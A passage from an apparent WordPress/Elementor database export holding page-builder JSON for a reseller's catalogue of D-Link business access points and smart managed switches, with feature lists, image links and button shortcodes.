Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7318,3374,'_elementor_version','2.5.14'),(7319,3374,'_elementor_edit_mode','builder'),(7322,3375,'_wp_page_template','template-fullwidth.php'),(7323,3375,'_elementor_template_type','post'),(7324,3375,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access 